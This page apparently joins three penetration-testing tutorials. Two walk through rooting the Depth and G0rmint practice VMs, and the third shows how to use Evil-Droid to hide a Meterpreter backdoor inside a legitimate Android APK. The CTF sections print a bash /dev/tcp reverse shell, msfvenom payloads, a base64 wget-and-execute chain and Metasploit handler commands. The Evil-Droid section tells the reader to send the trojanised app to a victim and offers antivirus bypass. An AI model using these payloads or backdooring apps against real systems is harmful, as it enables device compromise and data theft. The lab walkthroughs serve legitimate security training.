Hack the Depth VM (CTF Challenge)

Today we are going to take on a simple boot2root style VM challenge “Depth:1” by ‘Dan Lawson’. Here we have to root the server to complete the challenge.

Download it from here: https://download.vulnhub.com/depth/DepthB2R.ova

Difficulty: Intermediate

Penetrating Methodology:

Scanning

• Netdiscover
• NMAP

Enumeration

• Web Directory search 
• Credential harvesting

Exploiting

• Disable firewall through ssh
• Payload execution

Privilege Escalation

• Exploit sudo rights

Capture the Flag

Walkthrough

Scanning

Let’s start off by scanning the network and identifying host IPs. We can identify our host IP as 192.168.1.101 with the help of netdiscover. Next, port enumeration using nmap aggressive scan shows that port 8080 is open and is running http service of Apache Tomcat/Coyote JSP engine 1.1.

netdiscover

nmap  -A 192.168.1.101

Enumeration

We opened the IP into browser with port 8080. This gives a bit of useful information exposing the default Apache Tomcat’s directories

 Next, we are extracting the directories of jsp extension over the target, for that we can use the -X parameter of the dirb scan. Nikto result too shows the same file as you can see in the following screenshot:

dirb http://192.168.1.101:8080/ -X .jsp

nikto -h  http://192.168.1.101:8080/

 While opening the file in browser shows a file list checker script as a hint, which is supposed to list directories from the server upon request.

Upon executing the given script “ls-l/temp”, we can see user root and tomcat8 is there.

After trying few more scripts we get success by using ‘ls-l/home’ as  it shows us a user name bill.

 Here trying to find out running processes with “ps aux “, the options "aux" prints all the running process in system regardless from where they have been executed. And we find out that sshd service is in use but may be with restricted access.

Exploiting

let’s try to disable the firewall through ssh using user bill and it gets executed.

ssh bill@localhost sudo ufw disable

After that to gain reverse shell we first setup our netcat listener on port 1234 which you can see in last screenshot.
Then we are using bash reverse shell to gain access on host 192.168.1.110 on port 1234.

Msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.110 lport=1234 R

Copy the payload generated and execute it with ssh.

ssh bill@localhost 0<&46-;exec 46<>/dev/tcp/192.168.1.110/1234;sh <&46 >&46 2>&46

 Privilege Escalation and capturing the flag

As soon as we execute the payload, we get our reverse shell, now we just check sudo rights for bill and find that he has all permissions as well as he can login without any password. Great!  Now we just have to login and get into root folder. Here we get a file called flag.
Lastly, we open the flag file and capture the flag.
nc -lvp 1234
sudo -l
sudo su
cd /root
ls
cat flag

Hack the G0rmint VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as G0rmint. The credit for making this vm machine goes to “Noman Riffat” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.134 but you will have to find your own)

netdiscover

Use nmap for port enumeration.

nmap 192.168.1.134

Nmap scan shows us port 80 is open, so we open the ip address in our browser.

We don’t find anything any page. So we use dirb to find the directories for more information.

dirb http://192.168.1.134/

We open robots.txt and find a directory called /g0rmint/. 

When we open the directory we find a login page.

We take a look at the source code for more information.

When we take a look at the source code we find a backup directory called s3cretbackupdirectory/ We use dirb to enumerate files or pages in that directory.

We find a page called info.php when we open it we find a file name backup.zip.

We download the file for further information.

We extract the zip file and find that the file contains the source code for the webpage.

Now we take look inside style.css and we look at the name of the author.

cat style.css | grep Author

We use these details as username and email for reset password.

We now take a look at reset.php file.

We find that the new password is based on the time we reset our password. We create a  php file that generates a password based on the time displayed on the page.

Now we generate the password using our php script.

We go to the login page and use the email we find in the css file and use the password we just generated to login.

Now that we are authorized we take a look at the log file. In the config.php  we find that the logs are stored in s3r3t-dir3ct0ry-f0r-l0gs/ directory in the file name  format yy-mm-dd.php

Now we use the current date to open the log file.

Now we use upload basic php shell through email address. We put base64 decode so that we can bypass input firewall.

Now we convert our commands to base64, then we use those base64 encoded string to execute our command in the server.

When we execute our command the server runs it and we are able to see the files in that directory of the server.

Now we create an elf shell with msfvenom.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.116 lport=4444 -f elf > /var/www/html/shell

To upload our shell, we convert our commands to base64.

echo ‘wget http://192.168.1.116/shell; chmod +x shell; ./shell’ | base64

Now we setup our listener using metasploit.

msf > use multi/handler

msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.116

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

Now when we execute our command we get our reverse_shell

Now going through the files in the /var/www folder we find a file called backup.zip. when we try to extract it we find that it can be only extracted in tmp folder so we extract the zip file in /tmp/ folder.

unzip backup.zip -d /var/tmp

After extracting the zip file, we take a look inside the folder we extracted the files we find a sql file.

When we open the file we find a md5 encode password for the user g0rmint.

cat /var/tmp/db.sql | grep noman

Then we when we decrypt our md5 encode hash we find a password ‘tayyab123’.

We use this to connect through ssh.

ssh g0rmint@192.168.1.116

After connecting through ssh we use this password to gain root access.

When we get root access we go to root folder inside the root folder we get a file called flag.txt. when we open the file we get a congratulatory message for the completion of VM.

Android Mobile Exploitation with Evil-Droid

Hello friends! Today you will learn how to generate apk payload with help of “Evil-Droid”. It is the tool use to compromise any android deceive for attacking point, we are using it only for educational purpose.

Evil-Droid is a framework that creates & generates & embed apk payload to penetrate android platforms.

Requirement:

Attacker: Kali Linux

Target: Android

Lets Begin !!

Open the terminal in your kali Linux and execute given below command to download it from git hub.

git clone https://github.com/M4sc3r4n0/Evil-Droid.git

Now open the downloaded folder in terminal and type given below command to give all permission to the script “evil-droid”

chmod 777 evil-droid

Now execute given below command to run the script and lunch the evil-droid application.

./evil-droid

When you will execute above command evil-droid will start as shown in given below image. Here it will start from testing internet connection and its dependencies from available kali Linux tool by its own.

Then a prompt will pop up to confirm Evil droid framework requirement, here select option “yes”.

Now Evil droid framework will get open to hack remote android platform by execute given below options.

[1] APK MSF                                    

[2] BACKDOOR APK ORIGINAL (OLD)                

[3] BACKDOOR APK ORIGINAL (NEW)                

[4] BYPASS AV APK (ICON CHANGE)                

[5] START LISTENER                             

[c] CLEAN                                       

[q] QUIT                                       

[?] Select

From given below image you can perceive that we had choose option as “BACKDOOR APK ORIGINAL”

After that again a prompt will pop up in order to set LHOST [attacker’s IP] for reverse connection. Enter your kali Linux IP in given text field as shown in given below image.

After that again a prompt will pop up in order to set LPORT for reverse connection as shown in given below image.

In next prompt enter payload name you want to give to your apk payload as shown in given below image. Here I had given baidu-broswer name to my payload.

Now when everything is set by attacker for generating an apk payload at last he will get a list for payload option to choose type of payload he wants to generate as shown in given below image.

Here I had selected “android/meterpreter/reverse_http” as payload.

Now download any original apk file from Google in order to hide your payload in that file. Here I had downloaded baidu.apk to hide my baidu-browser payload inside it; you can download any other apk file of your choice.

This will now generate a malicious baidu.apk by hiding our backdoor inside it as shown in given below image. Now copy this malicious apk from given path /root/Evil-Droid/evilapk/baidu-browser.apk and send it to victim.

On other hand another prompt will pop up to choose following option:

·         Multi-Handler

·         Attack-vector

·         Main menu

·         Exit

From given below image you can observe that I had choose “multi handler” for reverse connection of victims system.

Now it will lunch multi-handler and start reverse TCP handler on attacker machine as shown in given below image. As soon as victim will download and run the malicious baidu.apk, attacker will get unauthorized access of his deceive on his machine.

Great!! From given below image you can observe meterpreter session 1 is opened

Meterpreter> sysinfo